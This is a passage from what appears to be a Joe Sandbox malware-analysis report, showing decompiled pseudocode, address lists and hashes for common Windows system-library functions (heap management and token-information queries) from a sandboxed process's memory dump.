								__eflags =  *_t143;
								if( *_t143 != 0) {
									_t183 = _t216;
									E04D6DAAF(0x230, _t183, _v12, _v8);
								}
								__eflags =  *(_t216 + 0x4c);
								_t201 =  *(_v12 + 0x24);
								if( *(_t216 + 0x4c) != 0) {
									 *_t201 =  *_t201 ^  *(_t216 + 0x50);
									__eflags = _t201[0] - (_t201[0] ^ _t201[0] ^  *_t201);
									if(__eflags != 0) {
										_push(_t183);
										E04D6D646(0x230, _t216, _t201, _t213, _t216, __eflags);
									}
								}
								_t209 =  *(_v12 + 0x24);
								goto L3;
							}
						}
					}
				}
				_v16 = _v16 >> 3;
				_t209 = E04CC1EB2(_t216, _t98,  &_v16, 0);
				_t188 = _t216;
				E04CC0B10(_t188, _t209, _v16);
				if( *(_t216 + 0x4c) != 0) {
					 *_t209 =  *_t209 ^  *(_t216 + 0x50);
					if(_t209[0] != (_t209[0] ^ _t209[0] ^  *_t209)) {
						_push(_t188);
						E04D6D646(0, _t216, _t209, _t209, _t216, __eflags);
					}
				}
				goto L3;
			}

0x04cc0450
0x04cc0452
0x04cc0457
0x04cc045a
0x04cc045c
0x04cc0467
0x04cc0471
0x04cc04b5
0x04cc04b9
0x04d14e4b
0x04d14e4b
0x04d14e4f
0x04d14e6c
0x04d14e6c
0x04d14e6e
0x04d14e70
0x04d14e76
0x04d14e79
0x04d14e87
0x04d14e8d
0x04d14e8d
0x04d14e79
0x04cc04ae
0x04cc04b4
0x04cc04b4
0x04d14e58
0x04d14e5a
0x04d14e5c
0x00000000
0x00000000
0x04d14e61
0x04d14e63
0x00000000
0x00000000
0x04d14e65
0x00000000
0x04d14e65
0x04cc04bf
0x04cc04c2
0x04cc04c8
0x04cc04cb
0x04cc04cd
0x04d14ceb
0x04d14ceb
0x04cc04d3
0x04cc04da
0x04cc0652
0x04cc04e0
0x04cc04e0
0x04cc04e0
0x04cc04e6
0x04cc04e8
0x04cc0659
0x04cc065e
0x04d14cf2
0x04d14cf2
0x04cc065e
0x04cc04f8
0x04cc04fd
0x04cc0500
0x04cc0502
0x04d14cfe
0x04d14cfe
0x04cc050d
0x04cc0512
0x04cc0513
0x04cc0518
0x04cc051e
0x04cc051f
0x04cc0524
0x04cc0525
0x04cc052c
0x04cc052e
0x04cc0530
0x04d14d06
0x04d14d06
0x04d14d09
0x04d14d0b
0x00000000
0x00000000
0x04d14d0d
0x04d14d0f
0x04d14d12
0x04d14d14
0x04d14d16
0x04d14d16
0x04d14d19
0x04d14d1f
0x04d14d24
0x04d14d25
0x04d14d2a
0x04d14d2b
0x04d14d32
0x04d14d34
0x04d14d36
0x00000000
0x04d14d38
0x04d14d38
0x00000000
0x04d14d38
0x04d14d36
0x04d14d3b
0x04d14d3d
0x00000000
0x00000000
0x04d14d43
0x04d14d49
0x00000000
0x04cc0536
0x04cc0536
0x04cc0539
0x04cc0539
0x04cc053c
0x04cc053f
0x04cc053f
0x04cc0545
0x04cc0548
0x04cc0669
0x04cc0669
0x04cc0562
0x04cc0565
0x04cc056a
0x04cc056c
0x04d14e3a
0x04d14e46
0x00000000
0x04cc0572
0x04cc0572
0x04cc0578
0x04cc057d
0x04cc057e
0x04cc0583
0x04cc0584
0x04cc058b
0x04cc058d
0x04cc058f
0x04d14e37
0x04d14e37
0x00000000
0x04d14e37
0x04cc05b1
0x04cc05b6
0x04cc05b8
0x04d14d51
0x04d14d51
0x04cc05be
0x04cc05c0
0x00000000
0x04cc05c6
0x04cc05c6
0x04cc05cb
0x04cc05d5
0x04cc05d7
0x04d14d64
0x04cc05dd
0x04cc05dd
0x04cc05dd
0x04cc05df
0x04cc05e2
0x04d14d6b
0x04d14d71
0x04d14d78
0x04d14d88
0x04d14d92
0x04d14d94
0x04d14d9f
0x04d14d9f
0x04d14d9f
0x04d14da4
0x04d14db7
0x04d14db7
0x04d14d78
0x04cc05e8
0x04cc05ed
0x04cc05f7
0x04cc05f9
0x04d14dca
0x04cc05ff
0x04cc05ff
0x04cc05ff
0x04cc0601
0x04cc0604
0x04d14dd6
0x04d14dd8
0x04d14de3
0x04d14de3
0x04d14de3
0x04d14de8
0x04d14dfb
0x04d14dfb
0x04cc060a
0x04cc060f
0x04cc0611
0x04d14e0e
0x04cc0617
0x04cc0617
0x04cc0617
0x04cc061c
0x04cc061f
0x04d14e1e
0x04d14e20
0x04d14e20
0x04cc0625
0x04cc062c
0x04cc062f
0x04cc0634
0x04cc063e
0x04cc0641
0x04d14e2a
0x04d14e2d
0x04d14e2d
0x04cc0641
0x04cc064a
0x00000000
0x04cc064a
0x04cc05c0
0x04cc056c
0x04cc0530
0x04cc0473
0x04cc0488
0x04cc048a
0x04cc048e
0x04cc0496
0x04cc049b
0x04cc04a8
0x04d14cdc
0x04d14ce1
0x04d14ce1
0x04cc04a8
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a17e833bc89b6b2239a8d7c43ebc6027d558e23357ef728cc8c4836d83431191
Instruction ID: 102f79a3a80248a3b3079a472d22d489be6610ecac0963130a0d895f3f1ffb63
Opcode Fuzzy Hash: a17e833bc89b6b2239a8d7c43ebc6027d558e23357ef728cc8c4836d83431191
Instruction Fuzzy Hash: 4AB1EF31700645EFDB25CBA6C890BBEBBB6AF84304F184569D9529B291DB30FA41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04CD0D01 Relevance: .3, Instructions: 295
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04CD0D01(intOrPtr __ecx) {
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t160;
				signed int _t162;
				signed int _t164;
				signed int _t168;
				signed int _t170;
				void* _t192;
				signed int _t195;
				intOrPtr _t196;
				signed int _t202;
				void* _t203;
				signed int _t206;
				signed int _t208;
				signed int _t212;
				signed int _t216;
				intOrPtr _t217;
				signed int _t220;
				void* _t223;
				signed int _t226;
				signed int _t228;
				intOrPtr _t230;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t237;
				signed int _t240;
				void* _t242;
				void* _t245;
				void* _t247;

				_push(0x70);
				_push(0x4d8c3f8);
				E04D07C40(_t192, _t237, _t242);
				 *((intOrPtr*)(_t245 - 0x68)) = __ecx;
				if( *0x4da5c80 == 0) {
					L4:
					_t134 = 0;
					goto L5;
				} else {
					if(E04CBE4B0( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t245 - 0x58, _t245 - 0x54) < 0) {
						 *((intOrPtr*)(_t245 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t245 - 0x54)) != 0) {
						_t194 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
						 *((intOrPtr*)(_t245 - 0x48)) =  *((intOrPtr*)( *[fs:0x30] + 0x18));
						 *(_t245 - 0x64) = 0;
						 *(_t245 - 0x6c) = 0;
						 *(_t245 - 0x5c) = 0;
						L04CC2330( *[fs:0x30], 0x4da6718);
						_t140 =  *0x4da5c80; // 0x1
						__eflags = _t140 - 1;
						if(__eflags != 0) {
							_t202 = 0xc;
							_t203 = _t245 - 0x40;
							_t142 = E04CE4CF8(_t203, _t140 * _t202, _t140 * _t202 >> 0x20);
							 *(_t245 - 0x44) = _t142;
							__eflags = _t142;
							if(_t142 < 0) {
								L50:
								E04CC24D0(0x4da6718);
								_t134 =  *(_t245 - 0x44);
								L5:
								 *[fs:0x0] =  *((intOrPtr*)(_t245 - 0x10));
								return _t134;
							}
							_push(_t203);
							_t223 = 0x10;
							_t204 =  *(_t245 - 0x40);
							_t145 = E04CA94A3( *(_t245 - 0x40), _t223);
							 *(_t245 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4da5d78; // 0x0
							_t240 = E04CC5D90(_t204, _t194, _t146 + 0xc0000,  *(_t245 - 0x40));
							 *(_t245 - 0x5c) = _t240;
							__eflags = _t240;
							if(_t240 == 0) {
								_t149 = 0xc0000017;
								 *(_t245 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t245 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t245 - 0x60) = _t240;
								_t150 =  *0x4da5c90; // 0x8
								 *(_t245 - 0x4c) = _t150;
								_push(_t245 - 0x74);
								_push(_t245 - 0x39);
								_push(_t245 - 0x58);
								_t195 = E04CE1796(_t194,  *((intOrPtr*)(_t245 - 0x54)),  *((intOrPtr*)(_t245 - 0x68)), _t240, 0, __eflags);
								 *(_t245 - 0x44) = _t195;
								__eflags = _t195;
								if(_t195 < 0) {
									L30:
									E04CC24D0(0x4da6718);
									__eflags = _t240 - _t245 - 0x38;
									if(_t240 != _t245 - 0x38) {
										_t241 =  *((intOrPtr*)(_t245 - 0x48));
										E04CC3BC0( *((intOrPtr*)(_t245 - 0x48)), 0, _t240);
									} else {
										_t241 =  *((intOrPtr*)(_t245 - 0x48));
									}
									__eflags =  *(_t245 - 0x6c);
									if( *(_t245 - 0x6c) != 0) {
										E04CC3BC0(_t241, 0,  *(_t245 - 0x6c));
									}
									__eflags = _t195;
									if(_t195 >= 0) {
										goto L4;
									} else {
										_t134 = _t195;
										goto L5;
									}
								}
								_t206 =  *0x4da5c80; // 0x1
								 *(_t240 + 8) = _t206;
								__eflags =  *((char*)(_t245 - 0x39));
								if( *((char*)(_t245 - 0x39)) != 0) {
									 *((intOrPtr*)(_t240 + 4)) = 1;
									 *(_t240 + 0xc) =  *(_t245 - 0x4c);
									_t160 =  *0x4da5c90; // 0x8
									 *(_t245 - 0x4c) = _t160;
								} else {
									 *((intOrPtr*)(_t240 + 4)) = 0;
									 *(_t240 + 0xc) =  *(_t245 - 0x58);
								}
								 *((intOrPtr*)(_t245 - 0x54)) = E04CE1715( *((intOrPtr*)(_t245 - 0x74)), _t245 - 0x70);
								_t226 = 0;
								 *(_t245 - 0x40) = 0;
								 *(_t245 - 0x50) = 0;
								while(1) {
									_t162 =  *(_t240 + 8);
									__eflags = _t226 - _t162;
									if(_t226 >= _t162) {
										break;
									}
									_t230 =  *0x4da5d78; // 0x0
									_t216 = E04CC5D90( *((intOrPtr*)(_t245 - 0x54)) + 1,  *((intOrPtr*)(_t245 - 0x48)), _t230 + 0xc0000,  *(_t245 - 0x70) +  *((intOrPtr*)(_t245 - 0x54)) + 1);
									 *(_t245 - 0x78) = _t216;
									__eflags = _t216;
									if(_t216 == 0) {
										L52:
										_t195 = 0xc0000017;
										L19:
										 *(_t245 - 0x44) = _t195;
										L20:
										_t208 =  *(_t245 - 0x40);
										__eflags = _t208;
										if(_t208 == 0) {
											L26:
											__eflags = _t195;
											if(_t195 < 0) {
												E04CA7CF1( *((intOrPtr*)(_t245 - 0x68)), _t245 - 0x6c);
												__eflags =  *((char*)(_t245 - 0x39));
												if( *((char*)(_t245 - 0x39)) != 0) {
													 *0x4da5c90 =  *0x4da5c90 - 8;
												}
											} else {
												_t168 =  *(_t245 - 0x64);
												__eflags = _t168;
												if(_t168 != 0) {
													 *0x4da5c80 =  *0x4da5c80 - _t168;
												}
											}
											__eflags = _t195;
											if(_t195 >= 0) {
												 *((short*)( *((intOrPtr*)(_t245 - 0x68)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t228 = _t208 * 0xc;
										__eflags = _t228;
										_t196 =  *((intOrPtr*)(_t245 - 0x48));
										do {
											 *(_t245 - 0x40) = _t208 - 1;
											_t228 = _t228 - 0xc;
											 *(_t245 - 0x4c) = _t228;
											__eflags =  *(_t240 + _t228 + 0x10) & 0x00000002;
											if(( *(_t240 + _t228 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t240 + _t228 + 0x10) & 0x00000001;
												if(( *(_t240 + _t228 + 0x10) & 0x00000001) == 0) {
													 *(_t245 - 0x64) =  *(_t245 - 0x64) + 1;
													_t212 =  *(_t228 +  *(_t245 - 0x60) + 0x14);
													__eflags =  *((char*)(_t245 - 0x39));
													if( *((char*)(_t245 - 0x39)) == 0) {
														_t170 = _t212;
													} else {
														 *(_t245 - 0x50) =  *(_t212 +  *(_t245 - 0x58) * 4);
														E04CC3BC0(_t196, 0, _t212 - 8);
														_t170 =  *(_t245 - 0x50);
													}
													L36:
													E04CC3BC0(_t196, 0,  *((intOrPtr*)(_t170 - 4)));
													L37:
													_t208 =  *(_t245 - 0x40);
													_t228 =  *(_t245 - 0x4c);
													goto L24;
												}
												 *0x4da5c84 =  *0x4da5c84 + 1;
												goto L24;
											}
											_t170 =  *(_t228 +  *(_t245 - 0x60) + 0x14);
											__eflags = _t170;
											if(_t170 != 0) {
												__eflags =  *((char*)(_t245 - 0x39));
												if( *((char*)(_t245 - 0x39)) != 0) {
													E04CEB6C9(_t170,  *((intOrPtr*)(_t240 + _t228 + 0x18)));
													goto L37;
												}
												goto L36;
											}
											L24:
											__eflags = _t208;
										} while (_t208 != 0);
										_t195 =  *(_t245 - 0x44);
										goto L26;
									}
									_t234 =  *(_t245 - 0x70) + 0x00000001 + _t216 &  !( *(_t245 - 0x70));
									 *(_t245 - 0x7c) = _t234;
									 *(_t234 - 4) = _t216;
									 *((intOrPtr*)(_t245 - 4)) = 0;
									E04CF88C0(_t234,  *((intOrPtr*)( *((intOrPtr*)(_t245 - 0x74)) + 8)),  *((intOrPtr*)(_t245 - 0x54)));
									_t247 = _t247 + 0xc;
									 *((intOrPtr*)(_t245 - 4)) = 0xfffffffe;
									_t217 =  *((intOrPtr*)(_t245 - 0x48));
									__eflags = _t195;
									if(_t195 < 0) {
										E04CC3BC0(_t217, 0,  *(_t245 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t245 - 0x39));
									if( *((char*)(_t245 - 0x39)) != 0) {
										_t235 = E04CE174A( *(_t245 - 0x4c));
										 *(_t245 - 0x50) = _t235;
										__eflags = _t235;
										if(_t235 == 0) {
											E04CC3BC0( *((intOrPtr*)(_t245 - 0x48)), 0,  *(_t245 - 0x78));
											goto L52;
										}
										 *(_t235 +  *(_t245 - 0x58) * 4) =  *(_t245 - 0x7c);
										L17:
										_t236 =  *(_t245 - 0x40);
										_t220 = _t236 * 0xc;
										 *(_t220 +  *(_t245 - 0x60) + 0x14) =  *(_t245 - 0x50);
										 *((intOrPtr*)(_t220 + _t240 + 0x10)) = 0;
										_t226 = _t236 + 1;
										 *(_t245 - 0x40) = _t226;
										 *(_t245 - 0x50) = _t226;
										_t195 =  *(_t245 - 0x44);
										continue;
									}
									 *(_t245 - 0x50) =  *(_t245 - 0x7c);
									goto L17;
								}
								 *_t240 = 0;
								_t164 = 0x10 + _t162 * 0xc;
								__eflags = _t164;
								_push(_t164);
								_push(_t240);
								_push(0x23);
								_push(0xffffffff);
								_t195 = E04CF2B70();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t240 = _t245 - 0x38;
						 *(_t245 - 0x5c) = _t240;
						goto L8;
					}
					goto L4;
				}
			}

0x04cd0d01
0x04cd0d03
0x04cd0d08
0x04cd0d0d
0x04cd0d17
0x04cd0d3c
0x04cd0d3c
0x00000000
0x04cd0d19
0x04cd0d31
0x04cd0d33
0x04cd0d33
0x04cd0d3a
0x04cd0d54
0x04cd0d57
0x04cd0d5a
0x04cd0d5d
0x04cd0d62
0x04cd0d6a
0x04cd0d6f
0x04cd0d74
0x04cd0d77
0x04cd0f6f
0x04cd0f74
0x04cd0f77
0x04cd0f7c
0x04cd0f7f
0x04cd0f81
0x04d1a05f
0x04d1a064
0x04d1a069
0x04cd0d3e
0x04cd0d41
0x04cd0d4d
0x04cd0d4d
0x04cd0f89
0x04cd0f8c
0x04cd0f8d
0x04cd0f90
0x04cd0f95
0x04cd0f98
0x04cd0f9a
0x00000000
0x00000000
0x04cd0fa0
0x04cd0fb4
0x04cd0fb6
0x04cd0fb9
0x04cd0fbb
0x04d1a052
0x04d1a057
0x04cd0fc1
0x04cd0fc1
0x04cd0fc1
0x04cd0fc4
0x04cd0fc6
0x04cd0d83
0x04cd0d83
0x04cd0d86
0x04cd0d8b
0x04cd0d91
0x04cd0d95
0x04cd0d99
0x04cd0da5
0x04cd0da7
0x04cd0daa
0x04cd0dac
0x04cd0ef6
0x04cd0efb
0x04cd0f03
0x04cd0f05
0x04cd0fd3
0x04cd0fd7
0x04cd0f0b
0x04cd0f0b
0x04cd0f0b
0x04cd0f0e
0x04cd0f12
0x04d1a141
0x04d1a141
0x04cd0f18
0x04cd0f1a
0x00000000
0x04cd0f20
0x04d1a14b
0x00000000
0x04d1a14b
0x04cd0f1a
0x04cd0db2
0x04cd0db8
0x04cd0dbb
0x04cd0dbf
0x04cd0fe1
0x04cd0feb
0x04cd0fee
0x04cd0ff3
0x04cd0dc5
0x04cd0dc5
0x04cd0dcb
0x04cd0dcb
0x04cd0dd9
0x04cd0ddc
0x04cd0dde
0x04cd0de1
0x04cd0de4
0x04cd0de4
0x04cd0de7
0x04cd0de9
0x00000000
0x00000000
0x04cd0def
0x04cd0e0e
0x04cd0e10
0x04cd0e13
0x04cd0e15
0x04d1a07d
0x04d1a07d
0x04cd0e9c
0x04cd0e9c
0x04cd0e9f
0x04cd0e9f
0x04cd0ea2
0x04cd0ea4
0x04cd0ed3
0x04cd0ed3
0x04cd0ed5
0x04d1a121
0x04d1a126
0x04d1a12a
0x04d1a130
0x04d1a130
0x04cd0edb
0x04cd0edb
0x04cd0ede
0x04cd0ee0
0x04d1a110
0x04d1a110
0x04cd0ee0
0x04cd0ee6
0x04cd0ee8
0x04cd0ef2
0x04cd0ef2
0x00000000
0x04cd0ee8
0x04cd0ea6
0x04cd0ea6
0x04cd0ea9
0x04cd0eac
0x04cd0ead
0x04cd0eb0
0x04cd0eb3
0x04cd0eb6
0x04cd0ebb
0x04d1a0cb
0x04d1a0d0
0x04d1a0dd
0x04d1a0e3
0x04d1a0e7
0x04d1a0eb
0x04d1a109
0x04d1a0ed
0x04d1a0f3
0x04d1a0fc
0x04d1a101
0x04d1a101
0x04cd0f2b
0x04cd0f30
0x04cd0f35
0x04cd0f35
0x04cd0f38
0x00000000
0x04cd0f38
0x04d1a0d2
0x00000000
0x04d1a0d2
0x04cd0ec4
0x04cd0ec8
0x04cd0eca
0x04cd0f25
0x04cd0f29
0x04cd0f66
0x00000000
0x04cd0f66
0x00000000
0x04cd0f29
0x04cd0ecc
0x04cd0ecc
0x04cd0ecc
0x04cd0ed0
0x00000000
0x04cd0ed0
0x04cd0e25
0x04cd0e27
0x04cd0e2a
0x04cd0e2d
0x04cd0e3a
0x04cd0e3f
0x04cd0e42
0x04cd0e49
0x04cd0e4c
0x04cd0e4e
0x04d1a0c1
0x00000000
0x04d1a0c1
0x04cd0e54
0x04cd0e58
0x04cd0f45
0x04cd0f47
0x04cd0f4a
0x04cd0f4c
0x04d1a078
0x00000000
0x04d1a078
0x04cd0f58
0x04cd0e64
0x04cd0e64
0x04cd0e67
0x04cd0e70
0x04cd0e74
0x04cd0e78
0x04cd0e79
0x04cd0e7c
0x04cd0e7f
0x00000000
0x04cd0e7f
0x04cd0e61
0x00000000
0x04cd0e61
0x04cd0e87
0x04cd0e8c
0x04cd0e8c
0x04cd0e8f
0x04cd0e90
0x04cd0e91
0x04cd0e93
0x04cd0e9a
0x00000000
0x04cd0fcc
0x00000000
0x04cd0fcc
0x04cd0fc6
0x04cd0d7d
0x04cd0d80
0x00000000
0x04cd0d80
0x00000000
0x04cd0d3a

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 902a177d59c486f103f97319283563c0b4687f698fb98e76a2a091db66e98f21
Instruction ID: 7ea7142e99da5cb38fc829881f35117238e1a5f4350160ce19a4a01e53f8fad6
Opcode Fuzzy Hash: 902a177d59c486f103f97319283563c0b4687f698fb98e76a2a091db66e98f21
Instruction Fuzzy Hash: 10C12C70E00209EFDB24DFAAD894AADBBB6FF44308F14412EE905AB355E774B941DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04CD8FFB Relevance: .3, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E04CD8FFB(void* __ecx, char __edx, signed int* _a4, signed int* _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int* _a24, signed int* _a28) {
				char _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void* _t74;
				intOrPtr _t91;
				signed int _t93;
				void* _t94;
				intOrPtr _t97;
				signed int _t99;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t106;
				signed int _t108;
				intOrPtr _t113;
				signed int _t115;
				intOrPtr _t120;
				signed int _t122;
				void* _t125;
				signed int* _t126;
				char _t131;
				char _t133;
				char _t138;
				intOrPtr _t149;
				intOrPtr* _t152;
				void* _t153;

				_v6 = __edx;
				_t125 = __ecx;
				_v12 = 0;
				 *_a16 = 0;
				_v5 = 0;
				 *_a8 = 0;
				 *_a28 = 0;
				_t152 = _a4;
				 *_a12 = 0;
				 *_a20 = 0;
				 *_t152 = 0;
				_t149 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t131 = 0x48;
				if(__ecx == 0) {
					L11:
					_t153 = E04CD9194(_t125, _a24);
					if(_t153 < 0) {
						L15:
						_t126 = _a28;
						L25:
						_t68 = _a4;
						if( *_a4 != 0) {
							E04CC3BC0(_t149, 0,  *_t68);
							 *_a4 =  *_a4 & 0x00000000;
						}
						_t69 = _a20;
						if( *_a20 != 0) {
							E04CC3BC0(_t149, 0,  *_t69);
							 *_a20 =  *_a20 & 0x00000000;
						}
						_t70 = _a8;
						if( *_a8 != 0) {
							E04CC3BC0(_t149, 0,  *_t70);
							 *_a8 =  *_a8 & 0x00000000;
						}
						_t71 = _a12;
						if( *_a12 != 0) {
							E04CC3BC0(_t149, 0,  *_t71);
							 *_a12 =  *_a12 & 0x00000000;
						}
						_t72 = _a24;
						if( *_a24 != 0) {
							E04CC3BC0(_t149, 0,  *_t72);
							 *_a24 =  *_a24 & 0x00000000;
						}
						_t73 = _a16;
						if( *_a16 != 0) {
							E04CC3BC0(_t149, 0,  *_t73);
							 *_a16 =  *_a16 & 0x00000000;
						}
						if( *_t126 != 0) {
							E04CC3BC0(_t149, 0,  *_t126);
							 *_t126 =  *_t126 & 0x00000000;
						}
						if(_v5 == 1) {
							_push(_v12);
							E04CF2A80();
						}
						_t74 = _t153;
						L14:
						return _t74;
					}
					if(_v6 != 0) {
						_push( &_v12);
						_push(8);
						_push(0xffffffff);
						_t153 = E04CF3C30();
						if(_t153 >= 0) {
							_t91 =  *0x4da5d78; // 0x0
							_t133 = 0x48;
							_v5 = 1;
							_v36 = _t133;
							_t93 = E04CC5D90(_t133, _t149, _t91 + 0x140000, _t133);
							 *_a16 = _t93;
							if(_t93 == 0) {
								L16:
								_t153 = 0xc0000017;
								goto L15;
							}
							_push( &_v36);
							_push(_v36);
							_push(_t93);
							_push(4);
							_push(_v12);
							_t94 = E04CF2BC0();
							_t126 = _a28;
							_t153 = _t94;
							if(_t153 < 0) {
								goto L25;
							}
							_push( &_v24);
							_push(0);
							_push( *_t126);
							_push(5);
							_push(_v12);
							_t153 = E04CF2BC0();
							if(_t153 != 0xc0000023) {
								goto L25;
							}
							_t97 =  *0x4da5d78; // 0x0
							_t99 = E04CC5D90( &_v36, _t149, _t97 + 0x140000, _v24);
							 *_t126 = _t99;
							if(_t99 == 0) {
								goto L25;
							}
							_push( &_v24);
							_push(_v24);
							_push(_t99);
							_push(5);
							_push(_v12);
							_t153 = E04CF2BC0();
							if(_t153 < 0) {
								goto L25;
							}
							_push(_v12);
							E04CF2A80();
							goto L13;
						}
						_v5 = 0;
						goto L15;
					}
					L13:
					_t74 = 0;
					goto L14;
				}
				_t102 =  *0x4da5d78; // 0x0
				_v28 = _t131;
				_t104 = E04CC5D90(_t131, _t149, _t102 + 0x140000, _t131);
				 *_t152 = _t104;
				if(_t104 == 0) {
					goto L16;
				}
				_push( &_v28);
				_push(_v28);
				_push(_t104);
				_push(4);
				_push(_t125);
				_t153 = E04CF2BC0();
				if(_t153 < 0) {
					goto L15;
				}
				_t106 =  *0x4da5d78; // 0x0
				_t138 = 0x4c;
				_v32 = _t138;
				_t108 = E04CC5D90(_t138, _t149, _t106 + 0x140000, _t138);
				 *_a20 = _t108;
				if(_t108 == 0) {
					goto L16;
				}
				_push( &_v32);
				_push(_v32);
				_push(_t108);
				_push(0x19);
				_push(_t125);
				_t153 = E04CF2BC0();
				if(_t153 < 0) {
					goto L15;
				}
				_push( &_v16);
				_push(0);
				_push( *_a8);
				_push(5);
				_push(_t125);
				_t153 = E04CF2BC0();
				if(_t153 != 0xc0000023) {
					goto L15;
				}
				_t113 =  *0x4da5d78; // 0x0
				_t115 = E04CC5D90( &_v32, _t149, _t113 + 0x140000, _v16);
				 *_a8 = _t115;
				if(_t115 == 0) {
					goto L16;
				}
				_push( &_v16);
				_push(_v16);
				_push(_t115);
				_push(5);
				_push(_t125);
				_t153 = E04CF2BC0();
				if(_t153 < 0) {
					goto L15;
				}
				_push( &_v20);
				_push(0);
				_push( *_a12);
				_push(6);
				_push(_t125);
				_t153 = E04CF2BC0();
				if(_t153 != 0xc0000023) {
					goto L15;
				}
				_t120 =  *0x4da5d78; // 0x0
				_t122 = E04CC5D90( &_v16, _t149, _t120 + 0x140000, _v20);
				 *_a12 = _t122;
				if(_t122 == 0) {
					goto L16;
				}
				_push( &_v20);
				_push(_v20);
				_push(_t122);
				_push(6);
				_push(_t125);
				_t153 = E04CF2BC0();
				if(_t153 < 0) {
					goto L15;
				}
				goto L11;
			}

0x04cd9006
0x04cd900c
0x04cd900e
0x04cd9014
0x04cd9019
0x04cd901c
0x04cd9021
0x04cd9027
0x04cd902a
0x04cd902c
0x04cd9034
0x04cd9039
0x04cd903c
0x04cd903f
0x04cd9169
0x04cd9173
0x04cd9177
0x04cd918c
0x04cd918c
0x04d1d491
0x04d1d491
0x04d1d497
0x04d1d49e
0x04d1d4a6
0x04d1d4a6
0x04d1d4a9
0x04d1d4af
0x04d1d4b6
0x04d1d4be
0x04d1d4be
0x04d1d4c1
0x04d1d4c7
0x04d1d4ce
0x04d1d4d6
0x04d1d4d6
0x04d1d4d9
0x04d1d4df
0x04d1d4e6
0x04d1d4ee
0x04d1d4ee
0x04d1d4f1
0x04d1d4f7
0x04d1d4fe
0x04d1d506
0x04d1d506
0x04d1d509
0x04d1d50f
0x04d1d516
0x04d1d51e
0x04d1d51e
0x04d1d524
0x04d1d52b
0x04d1d530
0x04d1d530
0x04d1d537
0x04d1d539
0x04d1d53c
0x04d1d53c
0x04d1d541
0x04cd9185
0x04cd9189
0x04cd9189
0x04cd917d
0x04d1d3dd
0x04d1d3de
0x04d1d3e0
0x04d1d3e7
0x04d1d3eb
0x04d1d3f6
0x04d1d3fd
0x04d1d404
0x04d1d40a
0x04d1d40d
0x04d1d415
0x04d1d419
0x04d1d3d0
0x04d1d3d0
0x00000000
0x04d1d3d0
0x04d1d41e
0x04d1d41f
0x04d1d422
0x04d1d423
0x04d1d425
0x04d1d428
0x04d1d42d
0x04d1d430
0x04d1d434
0x00000000
0x00000000
0x04d1d439
0x04d1d43a
0x04d1d43c
0x04d1d43e
0x04d1d440
0x04d1d448
0x04d1d450
0x00000000
0x00000000
0x04d1d452
0x04d1d461
0x04d1d466
0x04d1d46a
0x00000000
0x00000000
0x04d1d46f
0x04d1d470
0x04d1d473
0x04d1d474
0x04d1d476
0x04d1d47e
0x04d1d482
0x00000000
0x00000000
0x04d1d484
0x04d1d487
0x00000000
0x04d1d487
0x04d1d3ed
0x00000000
0x04d1d3ed
0x04cd9183
0x04cd9183
0x00000000
0x04cd9183
0x04cd9045
0x04cd9050
0x04cd9055
0x04cd905a
0x04cd905e
0x00000000
0x00000000
0x04cd9067
0x04cd9068
0x04cd906b
0x04cd906c
0x04cd906e
0x04cd9074
0x04cd9078
0x00000000
0x00000000
0x04cd907e
0x04cd9085
0x04cd908c
0x04cd9091
0x04cd9099
0x04cd909d
0x00000000
0x00000000
0x04cd90a6
0x04cd90a7
0x04cd90aa
0x04cd90ab
0x04cd90ad
0x04cd90b3
0x04cd90b7
0x00000000
0x00000000
0x04cd90c0
0x04cd90c4
0x04cd90c6
0x04cd90c8
0x04cd90ca
0x04cd90d0
0x04cd90d8
0x00000000
0x00000000
0x04cd90de
0x04cd90ed
0x04cd90f5
0x04cd90f9
0x00000000
0x00000000
0x04cd9102
0x04cd9103
0x04cd9106
0x04cd9107
0x04cd9109
0x04cd910f
0x04cd9113
0x00000000
0x00000000
0x04cd9118
0x04cd911c
0x04cd911e
0x04cd9120
0x04cd9122
0x04cd9128
0x04cd9130
0x00000000
0x00000000
0x04cd9132
0x04cd9141
0x04cd9149
0x04cd914d
0x00000000
0x00000000
0x04cd9156
0x04cd9157
0x04cd915a
0x04cd915b
0x04cd915d
0x04cd9163
0x04cd9167
0x00000000
0x00000000
0x00000000

Memory Dump Source

